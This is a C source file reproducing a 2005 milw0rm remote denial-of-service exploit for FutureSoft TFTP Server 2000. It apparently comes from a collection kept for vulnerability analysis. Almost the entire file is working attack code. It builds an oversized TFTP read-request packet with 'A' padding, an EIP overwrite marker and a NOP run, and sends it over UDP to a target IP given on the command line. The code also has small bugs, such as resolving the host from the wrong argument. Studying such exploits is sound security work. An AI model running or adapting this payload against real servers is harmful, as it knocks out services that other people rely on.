lilbool/vuln-code-analysis
0
1/*
2*
3* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
4* http://www.futuresoft.com/products/lit-tftp2000.htm
5* Bug Discovered by SIG^2 (http://www.security.org.sg)
6* Exploit coded By ATmaCA
7* Web: atmacasoft.com && spyinstructors.com
8* E-Mail: atmaca@icqmail.com
9* Credit to kozan
10* Usage:tftp_exp <targetIp> [targetPort]
11*
12*/
13
14/*
15*
16* Vulnerable Versions:
17* TFTP Server 2000 Evaluation Version 1.0.0.1
18*
19*/
20
21#include <windows.h>
22#include <stdio.h>
23
24#pragma comment(lib, "ws2_32.lib")
25
26/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
27char expbuffer[] =
28"\x00\x01"
29"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
30"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
31"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
32"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
33"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
34"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
35"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
36"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
37"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
38"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
39"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
40"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
41"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
42"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
43"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
44"\x58\x58\x58\x58" /* EIP */
45"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
46"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
47"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
48"\x69\x00";
49
50void main(int argc, char *argv[])
51{
52 WSADATA wsaData;
53 WORD wVersionRequested;
54 struct hostent *pTarget;
55 struct sockaddr_in sock;
56 SOCKET mysocket;
57 int destPORT = 69;//Default to 69
58
59 if (argc < 2){
60 printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");
61 printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
62 printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");
63 printf("Exploit coded By ATmaCA\n");
64 printf("Web: atmacasoft.com && spyinstructors.com\n");
65 printf("E-Mail: atmaca@icqmail.com\n");
66 printf("Credit to kozan\n");
67 printf("Usage:tftp_exp <targetIp> [targetPort]\n");
68 return;
69 }
70 if (argc==3)
71 destPORT=atoi(argv[2]);
72
73 printf("Requesting Winsock...\n");
74 wVersionRequested = MAKEWORD(1, 1);
75 if (WSAStartup(wVersionRequested, &wsaData) < 0) {
76 printf("No winsock suitable version found!");
77 return;
78 }
79 mysocket = socket(AF_INET, SOCK_DGRAM , 0);
80 if(mysocket==INVALID_SOCKET){
81 printf("Can't create UDP socket\n");
82 exit(1);
83 }
84 printf("Resolving Hostnames...\n");
85 if ((pTarget = gethostbyname(argv[2])) == NULL){
86 printf("Resolve of %s failed\n", argv[1]);
87 exit(1);
88 }
89 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
90 sock.sin_family = AF_INET;
91 sock.sin_port = htons(destPORT);
92
93 printf("Connecting...\n");
94 if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
95 printf("Couldn't connect to host.\n");
96 exit(1);
97 }
98
99 printf("Connected!...\n");
100 Sleep(10);
101
102 printf("RRQ->Sending packet. Size: %d\n",sizeof(expbuffer));
103 if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){
104 printf("Error sending packet\n");
105 closesocket(mysocket);
106 exit(1);
107 }
108 printf("Packet sent........\n");
109 printf("Success.\n");
110
111 closesocket(mysocket);
112 WSACleanup();
113}
114
115// milw0rm.com [2005-06-02]